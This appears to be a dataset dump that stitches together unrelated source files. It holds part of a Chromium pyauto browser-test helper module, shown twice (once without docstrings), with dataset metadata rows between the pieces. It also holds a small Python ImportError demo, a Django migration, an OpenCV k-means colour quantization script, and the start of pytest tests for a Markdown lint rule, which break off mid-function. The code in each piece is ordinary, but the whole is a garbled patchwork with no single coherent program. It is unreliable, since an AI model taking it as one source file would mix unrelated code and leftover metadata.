password: users login password input.
tab_index: The tab index, default is 0.
windex: The window index, default is 0.
"""
test.NavigateToURL('https://www.google.com/accounts/', windex, tab_index)
email_id = 'document.getElementById("Email").value = "%s"; ' \
'window.domAutomationController.send("done")' % username
password = 'document.getElementById("Passwd").value = "%s"; ' \
'window.domAutomationController.send("done")' % password
test.ExecuteJavascript(email_id, tab_index, windex)
test.ExecuteJavascript(password, tab_index, windex)
test.assertTrue(test.SubmitForm('gaia_loginform', tab_index, windex))
def VerifyGoogleAccountCredsFilled(test, username, password, tab_index=0,
windex=0):
"""Verify stored/saved user and password values to the values in the field.
Args:
test: derived from pyauto.PyUITest - base class for UI test cases.
username: user log in input.
password: user log in password input.
tab_index: The tab index, default is 0.
windex: The window index, default is 0.
"""
email_value = test.GetDOMValue('document.getElementById("Email").value',
tab_index, windex)
passwd_value = test.GetDOMValue('document.getElementById("Passwd").value',
tab_index, windex)
test.assertEqual(email_value, username)
# Not using assertEqual because if it fails it would end up dumping the
# password (which is supposed to be private)
test.assertTrue(passwd_value == password)
def ClearPasswords(test):
"""Clear saved passwords."""
test.ClearBrowsingData(['PASSWORDS'], 'EVERYTHING')
def Shell2(cmd_string, bg=False):
"""Run a shell command.
Args:
cmd_string: command to run
bg: should the process be run in background? Default: False
Returns:
Output, return code
"""
if not cmd_string: return ('', 0)
if bg:
cmd_string += ' 1>/dev/null 2>&1 &'
proc = os.popen(cmd_string)
if bg: return ('Background process: %s' % cmd_string, 0)
out = proc.read()
retcode = proc.close()
if not retcode: # Success
retcode = 0
return (out, retcode)
def SendMail(send_from, send_to, subject, text, smtp, file_to_send=None):
"""Send mail to all the group to notify about the crash and uploaded data.
Args:
send_from: from mail id.
send_to: to mail id.
subject: mail subject.
text: mail body.
smtp: The smtp to use.
file_to_send: attachments for the mail.
"""
msg = email.MIMEMultipart.MIMEMultipart()
msg['From'] = send_from
msg['To'] = send_to
msg['Date'] = email.Utils.formatdate(localtime=True)
msg['Subject'] = subject
# To send multiple files in one message, introduce for loop here for files.
msg.attach(email.MIMEText.MIMEText(text))
part = email.MIMEBase.MIMEBase('application', 'octet-stream')
if file_to_send is not None:
part.set_payload(open(file_to_send,'rb').read())
email.Encoders.encode_base64(part)
part.add_header('Content-Disposition',
'attachment; filename="%s"'
% os.path.basename(file_to_send))
msg.attach(part)
smtp_obj = smtplib.SMTP(smtp)
smtp_obj.sendmail(send_from, send_to, msg.as_string())
smtp_obj.close()
def GetFreeSpace(path):
"""Returns the free space (in bytes) on the drive containing |path|."""
if sys.platform == 'win32':
free_bytes = ctypes.c_ulonglong(0)
ctypes.windll.kernel32.GetDiskFreeSpaceExW(
ctypes.c_wchar_p(os.path.dirname(path)), None, None,
ctypes.pointer(free_bytes))
return free_bytes.value
fs_stat = os.statvfs(path)
return fs_stat.f_bsize * fs_stat.f_bavail
def StripUnmatchedKeys(item_to_strip, reference_item):
"""Returns a copy of 'item_to_strip' where unmatched key-value pairs in
every dictionary are removed.
This will examine each dictionary in 'item_to_strip' recursively, and will
remove keys that are not found in the corresponding dictionary in
'reference_item'. This is useful for testing equality of a subset of data.
Items may contain dictionaries, lists, or primitives, but only corresponding
dictionaries will be stripped. A corresponding entry is one which is found
in the same index in the corresponding parent array or at the same key in the
corresponding parent dictionary.
Arg:
item_to_strip: item to copy and remove all unmatched key-value pairs
reference_item: item that serves as a reference for which keys-value pairs
to strip from 'item_to_strip'
Returns:
a copy of 'item_to_strip' where all key-value pairs that do not have a
matching key in 'reference_item' are removed
Example:
item_to_strip = {'tabs': 3,
'time': 5908}
reference_item = {'tabs': 2}
StripUnmatchedKeys(item_to_strip, reference_item) will return {'tabs': 3}
"""
def StripList(list1, list2):
return_list = copy.deepcopy(list2)
for i in range(min(len(list1), len(list2))):
return_list[i] = StripUnmatchedKeys(list1[i], list2[i])
return return_list
def StripDict(dict1, dict2):
return_dict = {}
for key in dict1:
if key in dict2:
return_dict[key] = StripUnmatchedKeys(dict1[key], dict2[key])
return return_dict
item_to_strip_type = type(item_to_strip)
if item_to_strip_type is type(reference_item):
if item_to_strip_type is types.ListType:
return StripList(item_to_strip, reference_item)
elif item_to_strip_type is types.DictType:
return StripDict(item_to_strip, reference_item)
return copy.deepcopy(item_to_strip)
def StringContentCheck(test, content_string, have_list, nothave_list):
"""Check for the presence or absence of strings within content.
Confirm all strings in |have_list| are found in |content_string|.
Confirm all strings in |nothave_list| are not found in |content_string|.
Args:
content_string: string containing the content to check.
have_list: list of strings expected to be found within the content.
nothave_list: list of strings expected to not be found within the content.
"""
for s in have_list:
test.assertTrue(s in content_string,
msg='"%s" missing from content.' % s)
for s in nothave_list:
test.assertTrue(s not in content_string,
msg='"%s" unexpectedly contained in content.' % s)
def CallFunctionWithNewTimeout(self, new_timeout, function):
"""Sets the timeout to |new_timeout| and calls |function|.
This method resets the timeout before returning.
"""
timeout_changer = pyauto.PyUITest.ActionTimeoutChanger(
self, new_timeout)
logging.info('Automation execution timeout has been changed to %d. '
'If the timeout is large the test might appear to hang.'
% new_timeout)
function()
del timeout_changer
def GetOmniboxMatchesFor(self, text, windex=0, attr_dict=None):
"""Fetch omnibox matches with the given attributes for the given query.
Args:
text: the query text to use
windex: the window index to work on. Defaults to 0 (first window)
attr_dict: the dictionary of properties to be satisfied
Returns:
a list of match items
"""
self.SetOmniboxText(text, windex=windex)
self.WaitUntilOmniboxQueryDone(windex=windex)
if not attr_dict:
matches = self.GetOmniboxInfo(windex=windex).Matches()
else:
matches = self.GetOmniboxInfo(windex=windex).MatchesWithAttributes(
attr_dict=attr_dict)
return matches
def GetMemoryUsageOfProcess(pid):
"""Queries the system for the current memory usage of a specified process.
This function only works in Linux and ChromeOS.
Args:
pid: The integer process identifier for the process to use.
Returns:
The memory usage of the process in MB, given as a float. If the process
doesn't exist on the machine, then the value 0 is returned.
"""
assert pyauto.PyUITest.IsLinux() or pyauto.PyUITest.IsChromeOS()
process = subprocess.Popen('ps h -o rss -p %s' % pid, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = process.communicate()[0]
if stdout:
return float(stdout.strip()) / 1024
else:
return 0
def GetCredsKey():
"""Get the credential key associated with a bot on the waterfall.
The key is associated with the proper credentials in the text data file stored
in the private directory. The key determines a bot's OS and machine name. Each
key credential is associated with its own user/password value. This allows
sync integration tests to run in parallel on all bots.
Returns:
A String of the credentials key for the specified bot. Otherwise None.
"""
if pyauto.PyUITest.IsWin():
system_name = 'win'
elif pyauto.PyUITest.IsLinux():
system_name = 'linux'
elif pyauto.PyUITest.IsMac():
system_name = 'mac'
else:
return None
node = platform.uname()[1].split('.')[0]
creds_key = 'test_google_acct_%s_%s' % (system_name, node)
return creds_key
def SignInToSyncAndVerifyState(test, account_key):
"""Sign into sync and verify that it was successful.
Args:
test: derived from pyauto.PyUITest - base class for UI test cases.
account_key: the credentials key in the private account dictionary file.
"""
creds = test.GetPrivateInfo()[account_key]
username = creds['username']
password = creds['password']
test.assertTrue(test.GetSyncInfo()['last synced'] == 'Never')
test.assertTrue(test.SignInToSync(username, password))
test.assertTrue(test.GetSyncInfo()['last synced'] == 'Just now')
def LoginToDevice(test, test_account='test_google_account'):
"""Login to the Chromeos device using the given test account.
If no test account is specified, we use test_google_account as the default.
You can choose test accounts from -
chrome/test/data/pyauto_private/private_tests_info.txt
Args:
test_account: The account used to login to the Chromeos device.
"""
if not test.GetLoginInfo()['is_logged_in']:
credentials = test.GetPrivateInfo()[test_account]
test.Login(credentials['username'], credentials['password'])
login_info = test.GetLoginInfo()
test.assertTrue(login_info['is_logged_in'], msg='Login failed.')
else:
test.fail(msg='Another user is already logged in. Please logout first.')
def GetInfobarIndexByType(test, infobar_type, windex=0, tab_index=0):
"""Returns the index of the infobar of the given type.
Args:
test: Derived from pyauto.PyUITest - base class for UI test cases.
infobar_type: The infobar type to look for.
windex: Window index.
tab_index: Tab index.
Returns:
Index of infobar for infobar type, or None if not found.
"""
infobar_list = (
test.GetBrowserInfo()['windows'][windex]['tabs'][tab_index] \
['infobars'])
for infobar in infobar_list:
if infobar_type == infobar['type']:
return infobar_list.index(infobar)
return None
def WaitForInfobarTypeAndGetIndex(test, infobar_type, windex=0, tab_index=0):
"""Wait for infobar type to appear and returns its index.
If the infobar never appears, an exception will be raised.
Args:
test: Derived from pyauto.PyUITest - base class for UI test cases.
infobar_type: The infobar type to look for.
windex: Window index. Defaults to 0 (first window).
tab_index: Tab index. Defaults to 0 (first tab).
Returns:
Index of infobar for infobar type.
"""
test.assertTrue(
test.WaitUntil(lambda: GetInfobarIndexByType(
test, infobar_type, windex, tab_index) is not None),
msg='Infobar type for %s did not appear.' % infobar_type)
# Return the infobar index.
return GetInfobarIndexByType(test, infobar_type, windex, tab_index)
def AssertInfobarTypeDoesNotAppear(test, infobar_type, windex=0, tab_index=0):
"""Check that the infobar type does not appear.
This function waits 20s to assert that the infobar does not appear.
Args:
test: Derived from pyauto.PyUITest - base class for UI test cases.
infobar_type: The infobar type to look for.
windex: Window index. Defaults to 0 (first window).
tab_index: Tab index. Defaults to 0 (first tab).
"""
test.assertFalse(
test.WaitUntil(lambda: GetInfobarIndexByType(
test, infobar_type, windex, tab_index) is not None, timeout=20),
msg=('Infobar type for %s appeared when it should be hidden.'
% infobar_type))
| 35.270784
| 80
| 0.709947
|
import copy
import ctypes
import email
import logging
import os
import platform
import shutil
import smtplib
import subprocess
import sys
import types
import pyauto_functional
import pyauto
import pyauto_utils
def CopyFileFromDataDirToDownloadDir(test, file_path):
data_file = os.path.join(test.DataDir(), file_path)
download_dir = test.GetDownloadDirectory().value()
shutil.copy(data_file, download_dir)
def DownloadFileFromDownloadsDataDir(test, file_name):
file_url = test.GetFileURLForDataPath(os.path.join('downloads', file_name))
downloaded_pkg = os.path.join(test.GetDownloadDirectory().value(),
file_name)
if os.path.exists(downloaded_pkg):
RemoveDownloadedTestFile(test, file_name)
pre_download_ids = [x['id'] for x in test.GetDownloadsInfo().Downloads()]
test.DownloadAndWaitForStart(file_url)
test.WaitForAllDownloadsToComplete(pre_download_ids)
def RemoveDownloadedTestFile(test, file_name):
downloaded_pkg = os.path.join(test.GetDownloadDirectory().value(),
file_name)
pyauto_utils.RemovePath(downloaded_pkg)
pyauto_utils.RemovePath(downloaded_pkg + '.crdownload')
def GoogleAccountsLogin(test, username, password, tab_index=0, windex=0):
test.NavigateToURL('https://www.google.com/accounts/', windex, tab_index)
email_id = 'document.getElementById("Email").value = "%s"; ' \
'window.domAutomationController.send("done")' % username
password = 'document.getElementById("Passwd").value = "%s"; ' \
'window.domAutomationController.send("done")' % password
test.ExecuteJavascript(email_id, tab_index, windex)
test.ExecuteJavascript(password, tab_index, windex)
test.assertTrue(test.SubmitForm('gaia_loginform', tab_index, windex))
def VerifyGoogleAccountCredsFilled(test, username, password, tab_index=0,
windex=0):
email_value = test.GetDOMValue('document.getElementById("Email").value',
tab_index, windex)
passwd_value = test.GetDOMValue('document.getElementById("Passwd").value',
tab_index, windex)
test.assertEqual(email_value, username)
test.assertTrue(passwd_value == password)
def ClearPasswords(test):
test.ClearBrowsingData(['PASSWORDS'], 'EVERYTHING')
def Shell2(cmd_string, bg=False):
if not cmd_string: return ('', 0)
if bg:
cmd_string += ' 1>/dev/null 2>&1 &'
proc = os.popen(cmd_string)
if bg: return ('Background process: %s' % cmd_string, 0)
out = proc.read()
retcode = proc.close()
if not retcode:
retcode = 0
return (out, retcode)
def SendMail(send_from, send_to, subject, text, smtp, file_to_send=None):
msg = email.MIMEMultipart.MIMEMultipart()
msg['From'] = send_from
msg['To'] = send_to
msg['Date'] = email.Utils.formatdate(localtime=True)
msg['Subject'] = subject
msg.attach(email.MIMEText.MIMEText(text))
part = email.MIMEBase.MIMEBase('application', 'octet-stream')
if file_to_send is not None:
part.set_payload(open(file_to_send,'rb').read())
email.Encoders.encode_base64(part)
part.add_header('Content-Disposition',
'attachment; filename="%s"'
% os.path.basename(file_to_send))
msg.attach(part)
smtp_obj = smtplib.SMTP(smtp)
smtp_obj.sendmail(send_from, send_to, msg.as_string())
smtp_obj.close()
def GetFreeSpace(path):
if sys.platform == 'win32':
free_bytes = ctypes.c_ulonglong(0)
ctypes.windll.kernel32.GetDiskFreeSpaceExW(
ctypes.c_wchar_p(os.path.dirname(path)), None, None,
ctypes.pointer(free_bytes))
return free_bytes.value
fs_stat = os.statvfs(path)
return fs_stat.f_bsize * fs_stat.f_bavail
def StripUnmatchedKeys(item_to_strip, reference_item):
def StripList(list1, list2):
return_list = copy.deepcopy(list2)
for i in range(min(len(list1), len(list2))):
return_list[i] = StripUnmatchedKeys(list1[i], list2[i])
return return_list
def StripDict(dict1, dict2):
return_dict = {}
for key in dict1:
if key in dict2:
return_dict[key] = StripUnmatchedKeys(dict1[key], dict2[key])
return return_dict
item_to_strip_type = type(item_to_strip)
if item_to_strip_type is type(reference_item):
if item_to_strip_type is types.ListType:
return StripList(item_to_strip, reference_item)
elif item_to_strip_type is types.DictType:
return StripDict(item_to_strip, reference_item)
return copy.deepcopy(item_to_strip)
def StringContentCheck(test, content_string, have_list, nothave_list):
for s in have_list:
test.assertTrue(s in content_string,
msg='"%s" missing from content.' % s)
for s in nothave_list:
test.assertTrue(s not in content_string,
msg='"%s" unexpectedly contained in content.' % s)
def CallFunctionWithNewTimeout(self, new_timeout, function):
timeout_changer = pyauto.PyUITest.ActionTimeoutChanger(
self, new_timeout)
logging.info('Automation execution timeout has been changed to %d. '
'If the timeout is large the test might appear to hang.'
% new_timeout)
function()
del timeout_changer
def GetOmniboxMatchesFor(self, text, windex=0, attr_dict=None):
self.SetOmniboxText(text, windex=windex)
self.WaitUntilOmniboxQueryDone(windex=windex)
if not attr_dict:
matches = self.GetOmniboxInfo(windex=windex).Matches()
else:
matches = self.GetOmniboxInfo(windex=windex).MatchesWithAttributes(
attr_dict=attr_dict)
return matches
def GetMemoryUsageOfProcess(pid):
assert pyauto.PyUITest.IsLinux() or pyauto.PyUITest.IsChromeOS()
process = subprocess.Popen('ps h -o rss -p %s' % pid, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = process.communicate()[0]
if stdout:
return float(stdout.strip()) / 1024
else:
return 0
def GetCredsKey():
if pyauto.PyUITest.IsWin():
system_name = 'win'
elif pyauto.PyUITest.IsLinux():
system_name = 'linux'
elif pyauto.PyUITest.IsMac():
system_name = 'mac'
else:
return None
node = platform.uname()[1].split('.')[0]
creds_key = 'test_google_acct_%s_%s' % (system_name, node)
return creds_key
def SignInToSyncAndVerifyState(test, account_key):
creds = test.GetPrivateInfo()[account_key]
username = creds['username']
password = creds['password']
test.assertTrue(test.GetSyncInfo()['last synced'] == 'Never')
test.assertTrue(test.SignInToSync(username, password))
test.assertTrue(test.GetSyncInfo()['last synced'] == 'Just now')
def LoginToDevice(test, test_account='test_google_account'):
if not test.GetLoginInfo()['is_logged_in']:
credentials = test.GetPrivateInfo()[test_account]
test.Login(credentials['username'], credentials['password'])
login_info = test.GetLoginInfo()
test.assertTrue(login_info['is_logged_in'], msg='Login failed.')
else:
test.fail(msg='Another user is already logged in. Please logout first.')
def GetInfobarIndexByType(test, infobar_type, windex=0, tab_index=0):
infobar_list = (
test.GetBrowserInfo()['windows'][windex]['tabs'][tab_index] \
['infobars'])
for infobar in infobar_list:
if infobar_type == infobar['type']:
return infobar_list.index(infobar)
return None
def WaitForInfobarTypeAndGetIndex(test, infobar_type, windex=0, tab_index=0):
test.assertTrue(
test.WaitUntil(lambda: GetInfobarIndexByType(
test, infobar_type, windex, tab_index) is not None),
msg='Infobar type for %s did not appear.' % infobar_type)
return GetInfobarIndexByType(test, infobar_type, windex, tab_index)
def AssertInfobarTypeDoesNotAppear(test, infobar_type, windex=0, tab_index=0):
test.assertFalse(
test.WaitUntil(lambda: GetInfobarIndexByType(
test, infobar_type, windex, tab_index) is not None, timeout=20),
msg=('Infobar type for %s appeared when it should be hidden.'
% infobar_type))
| true
| true
|
1c3e7b52832204ee95f8948fbb41dd0bd1476aab
| 222
|
py
|
Python
|
importError.py
|
mkseth4774/ine-guide-to-network-programmability-python-course-files
|
35c49dfcf8e8f1b69435987a00fb9a236b803d9f
|
[
"MIT"
] | null | null | null |
importError.py
|
mkseth4774/ine-guide-to-network-programmability-python-course-files
|
35c49dfcf8e8f1b69435987a00fb9a236b803d9f
|
[
"MIT"
] | null | null | null |
importError.py
|
mkseth4774/ine-guide-to-network-programmability-python-course-files
|
35c49dfcf8e8f1b69435987a00fb9a236b803d9f
|
[
"MIT"
] | null | null | null |
##
##
try:
import sys
import os
import time
import somethingthatdoesnotexist
except ImportError:
print('Houston, we have an import problem!')
print('We are going to run anyway!')
##
## End of file...
| 14.8
| 48
| 0.657658
|
try:
import sys
import os
import time
import somethingthatdoesnotexist
except ImportError:
print('Houston, we have an import problem!')
print('We are going to run anyway!')
| true
| true
|
1c3e7e00dd940ceea153638844fe30bac5ad49cd
| 1,687
|
py
|
Python
|
UMSLHackRestAPI/api/migrations/0002_auto_20200222_1833.py
|
trujivan/climate-impact-changes
|
609b8197b0ede1c1fdac3aa82b34e73e6f4526e3
|
[
"MIT"
] | 1
|
2020-03-29T17:52:26.000Z
|
2020-03-29T17:52:26.000Z
|
UMSLHackRestAPI/api/migrations/0002_auto_20200222_1833.py
|
trujivan/climate-impact-changes
|
609b8197b0ede1c1fdac3aa82b34e73e6f4526e3
|
[
"MIT"
] | 6
|
2021-03-19T00:01:21.000Z
|
2021-09-22T18:37:17.000Z
|
UMSLHackRestAPI/api/migrations/0002_auto_20200222_1833.py
|
trujivan/climate-impact-changes
|
609b8197b0ede1c1fdac3aa82b34e73e6f4526e3
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.0.3 on 2020-02-23 00:33
import api.models
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('api', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='MLRequest',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('start_year', models.IntegerField(default=2017)),
('end_year', models.IntegerField(default=2020)),
('state', models.CharField(max_length=100)),
('factor', models.CharField(max_length=50)),
('created_at', models.DateTimeField(auto_now_add=True)),
],
),
migrations.AlterField(
model_name='yearmodel',
name='year',
field=models.IntegerField(choices=[(2017, 2017), (2018, 2018), (2019, 2019), (2020, 2020), (2021, 2021), (2022, 2022), (2023, 2023), (2024, 2024), (2025, 2025), (2026, 2026), (2027, 2027), (2028, 2028), (2029, 2029)], default=api.models.current_year),
),
migrations.CreateModel(
name='Prediction',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('year', models.IntegerField()),
('pollution', models.DecimalField(decimal_places=2, max_digits=32)),
('request', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='predictions', to='api.MLRequest')),
],
),
]
| 41.146341
| 263
| 0.583284
|
import api.models
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('api', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='MLRequest',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('start_year', models.IntegerField(default=2017)),
('end_year', models.IntegerField(default=2020)),
('state', models.CharField(max_length=100)),
('factor', models.CharField(max_length=50)),
('created_at', models.DateTimeField(auto_now_add=True)),
],
),
migrations.AlterField(
model_name='yearmodel',
name='year',
field=models.IntegerField(choices=[(2017, 2017), (2018, 2018), (2019, 2019), (2020, 2020), (2021, 2021), (2022, 2022), (2023, 2023), (2024, 2024), (2025, 2025), (2026, 2026), (2027, 2027), (2028, 2028), (2029, 2029)], default=api.models.current_year),
),
migrations.CreateModel(
name='Prediction',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('year', models.IntegerField()),
('pollution', models.DecimalField(decimal_places=2, max_digits=32)),
('request', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='predictions', to='api.MLRequest')),
],
),
]
| true
| true
|
1c3e7e4ce8433895dd5660f5df52b956b3fc31ee
| 2,269
|
py
|
Python
|
Chapter10/01-chapter-content/k_means_color_quantization.py
|
yaojh01/Mastering-OpenCV-4-with-Python
|
e8f83e314b8ed638edb6515967cfb24361b787af
|
[
"MIT"
] | 2
|
2021-06-29T22:00:47.000Z
|
2021-06-30T02:46:19.000Z
|
Chapter10/01-chapter-content/k_means_color_quantization.py
|
yaojh01/Mastering-OpenCV-4-with-Python
|
e8f83e314b8ed638edb6515967cfb24361b787af
|
[
"MIT"
] | null | null | null |
Chapter10/01-chapter-content/k_means_color_quantization.py
|
yaojh01/Mastering-OpenCV-4-with-Python
|
e8f83e314b8ed638edb6515967cfb24361b787af
|
[
"MIT"
] | 1
|
2019-10-03T20:34:43.000Z
|
2019-10-03T20:34:43.000Z
|
"""
K-means clustering algorithm applied to color quantization
"""
# Import required packages:
import numpy as np
import cv2
from matplotlib import pyplot as plt
def show_img_with_matplotlib(color_img, title, pos):
"""Shows an image using matplotlib capabilities"""
# Convert BGR image to RGB
img_RGB = color_img[:, :, ::-1]
ax = plt.subplot(2, 3, pos)
plt.imshow(img_RGB)
plt.title(title)
plt.axis('off')
def color_quantization(image, k):
"""Performs color quantization using K-means clustering algorithm"""
# Transform image into 'data':
data = np.float32(image).reshape((-1, 3))
# print(data.shape)
# Define the algorithm termination criteria (the maximum number of iterations and/or the desired accuracy):
# In this case the maximum number of iterations is set to 20 and epsilon = 1.0
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 20, 1.0)
# Apply K-means clustering algorithm:
ret, label, center = cv2.kmeans(data, k, None, criteria, 10, cv2.KMEANS_RANDOM_CENTERS)
# At this point we can make the image with k colors
# Convert center to uint8:
center = np.uint8(center)
# Replace pixel values with their center value:
result = center[label.flatten()]
result = result.reshape(img.shape)
return result
# Create the dimensions of the figure and set title:
fig = plt.figure(figsize=(16, 8))
plt.suptitle("Color quantization using K-means clustering algorithm", fontsize=14, fontweight='bold')
fig.patch.set_facecolor('silver')
# Load BGR image:
img = cv2.imread('landscape_1.jpg')
# Apply color quantization:
color_3 = color_quantization(img, 3)
color_5 = color_quantization(img, 5)
color_10 = color_quantization(img, 10)
color_20 = color_quantization(img, 20)
color_40 = color_quantization(img, 40)
# Plot the images:
show_img_with_matplotlib(img, "original image", 1)
show_img_with_matplotlib(color_3, "color quantization (k = 3)", 2)
show_img_with_matplotlib(color_5, "color quantization (k = 5)", 3)
show_img_with_matplotlib(color_10, "color quantization (k = 10)", 4)
show_img_with_matplotlib(color_20, "color quantization (k = 20)", 5)
show_img_with_matplotlib(color_40, "color quantization (k = 40)", 6)
# Show the Figure:
plt.show()
| 31.957746
| 111
| 0.72543
|
import numpy as np
import cv2
from matplotlib import pyplot as plt
def show_img_with_matplotlib(color_img, title, pos):
img_RGB = color_img[:, :, ::-1]
ax = plt.subplot(2, 3, pos)
plt.imshow(img_RGB)
plt.title(title)
plt.axis('off')
def color_quantization(image, k):
data = np.float32(image).reshape((-1, 3))
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 20, 1.0)
ret, label, center = cv2.kmeans(data, k, None, criteria, 10, cv2.KMEANS_RANDOM_CENTERS)
center = np.uint8(center)
result = center[label.flatten()]
result = result.reshape(img.shape)
return result
fig = plt.figure(figsize=(16, 8))
plt.suptitle("Color quantization using K-means clustering algorithm", fontsize=14, fontweight='bold')
fig.patch.set_facecolor('silver')
img = cv2.imread('landscape_1.jpg')
color_3 = color_quantization(img, 3)
color_5 = color_quantization(img, 5)
color_10 = color_quantization(img, 10)
color_20 = color_quantization(img, 20)
color_40 = color_quantization(img, 40)
show_img_with_matplotlib(img, "original image", 1)
show_img_with_matplotlib(color_3, "color quantization (k = 3)", 2)
show_img_with_matplotlib(color_5, "color quantization (k = 5)", 3)
show_img_with_matplotlib(color_10, "color quantization (k = 10)", 4)
show_img_with_matplotlib(color_20, "color quantization (k = 20)", 5)
show_img_with_matplotlib(color_40, "color quantization (k = 40)", 6)
plt.show()
| true
| true
|
1c3e7f168ba1b2c202fb5b181c9780fee159aa25
| 22,828
|
py
|
Python
|
test/test_md030_ordered.py
|
jackdewinter/pymarkdown
|
7ae408ba0b24506fa07552ffe520750bbff38c53
|
[
"MIT"
] | 20
|
2021-01-14T17:39:09.000Z
|
2022-03-14T08:35:22.000Z
|
test/test_md030_ordered.py
|
jackdewinter/pymarkdown
|
7ae408ba0b24506fa07552ffe520750bbff38c53
|
[
"MIT"
] | 304
|
2020-08-15T23:24:00.000Z
|
2022-03-31T23:34:03.000Z
|
test/test_md030_ordered.py
|
jackdewinter/pymarkdown
|
7ae408ba0b24506fa07552ffe520750bbff38c53
|
[
"MIT"
] | 3
|
2021-08-11T10:26:26.000Z
|
2021-11-02T20:41:27.000Z
|
"""
Module to provide tests related to the MD030 rule.
"""
from test.markdown_scanner import MarkdownScanner
import pytest
# pylint: disable=too-many-lines
@pytest.mark.rules
def test_md030_bad_configuration_ol_single():
"""
Test to verify that a configuration error is thrown when supplying the
ol_single value with a string that is not an integer.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=not-integer",
"--strict-config",
"scan",
"test/resources/rules/md030/good_one_list.md",
]
expected_return_code = 1
expected_output = ""
expected_error = (
"BadPluginError encountered while configuring plugins:\n"
+ "The value for property 'plugins.md030.ol_single' must be of type 'int'."
)
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_configuration_ol_single_zero():
"""
Test to verify that a configuration error is thrown when supplying the
ol_single value with an integer not greater than 0.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#0",
"--strict-config",
"scan",
"test/resources/rules/md030/good_one_list.md",
]
expected_return_code = 1
expected_output = ""
expected_error = (
"BadPluginError encountered while configuring plugins:\n"
+ "The value for property 'plugins.md030.ol_single' is not valid: Allowable values are any integer greater than 0."
)
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_configuration_ol_multi():
"""
Test to verify that a configuration error is thrown when supplying the
ol_multi value with a string that is not an integer.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_multi=not-integer",
"--strict-config",
"scan",
"test/resources/rules/md030/good_one_list.md",
]
expected_return_code = 1
expected_output = ""
expected_error = (
"BadPluginError encountered while configuring plugins:\n"
+ "The value for property 'plugins.md030.ol_multi' must be of type 'int'."
)
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_configuration_ol_multi_zero():
"""
Test to verify that a configuration error is thrown when supplying the
ol_multi value with an integer not greater than 0.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_multi=$#0",
"--strict-config",
"scan",
"test/resources/rules/md030/good_one_list.md",
]
expected_return_code = 1
expected_output = ""
expected_error = (
"BadPluginError encountered while configuring plugins:\n"
+ "The value for property 'plugins.md030.ol_multi' is not valid: Allowable values are any integer greater than 0."
)
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_good_spacing_ol_single_x():
"""
Test to make sure this rule does not trigger with a document that
contains ordered lists with a single space after the marker.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"scan",
"test/resources/rules/md030/good_spacing_ol_single.md",
]
expected_return_code = 0
expected_output = ""
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_good_spacing_ol_single_with_config_1_2():
"""
Test to make sure this rule does not trigger with a document that
contains ordered lists with a single space after the marker,
with configuration. ul_multi does not come into effect as all
lines are single
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#1",
"--set",
"plugins.md030.ol_multi=$#2",
"--strict-config",
"scan",
"test/resources/rules/md030/good_spacing_ol_single.md",
]
expected_return_code = 0
expected_output = ""
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_good_spacing_ol_single_with_config_2_1():
"""
Test to make sure this rule does trigger with a document that
contains unordered lists with a single space after the marker,
and configuration that applies.
"""
# Arrange
scanner = MarkdownScanner()
supplied_arguments = [
"--set",
"plugins.md030.ol_single=$#2",
"--set",
"plugins.md030.ol_multi=$#1",
"--strict-config",
"scan",
"test/resources/rules/md030/good_spacing_ol_single.md",
]
expected_return_code = 1
expected_output = (
"test/resources/rules/md030/good_spacing_ol_single.md:1:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 2; Actual: 1] (list-marker-space)\n"
+ "test/resources/rules/md030/good_spacing_ol_single.md:2:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 2; Actual: 1] (list-marker-space)\n"
+ "test/resources/rules/md030/good_spacing_ol_single.md:3:1: "
+ "MD030: Spaces after list markers "
+ "[Expected: 2; Actual: 1] (list-marker-space)"
)
expected_error = ""
# Act
execute_results = scanner.invoke_main(arguments=supplied_arguments)
# Assert
execute_results.assert_results(
expected_output, expected_error, expected_return_code
)
@pytest.mark.rules
def test_md030_bad_spacing_ol_single():
"""
